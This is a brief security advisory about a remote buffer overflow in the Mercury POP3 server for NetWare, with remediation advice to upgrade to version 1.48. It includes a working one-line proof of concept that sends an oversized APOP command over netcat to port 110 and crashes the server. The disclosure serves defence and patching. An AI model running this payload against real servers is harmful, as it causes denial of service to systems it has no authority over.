COMMAND

    Mercury

SYSTEMS AFFECTED

    Mercury for NetWare POP3

PROBLEM

    Przemyslaw Frasunek found following.  All versions of  widely-used
    POP3 server from Mercury MTA package for Netware are vulnerable to
    remote buffer overflow allowing to crash Netware server:

        perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc host 110

    Remote execution of malicious code is also theoretically possible.

SOLUTION

    Problem was  fixed in  Mercury 1.48,  but no  advisory was  issued
    and  older  versions  are  still  in  wide use.  All Mercury-based
    servers should be immediately updated.

    However, it  seems that  on Mercury  1.48 on  Netware 4.10  and it
    crashed.  Mercury 1.48 on Netware 4.11 didn't crashed (then again,
    4.10 is not supported anymore).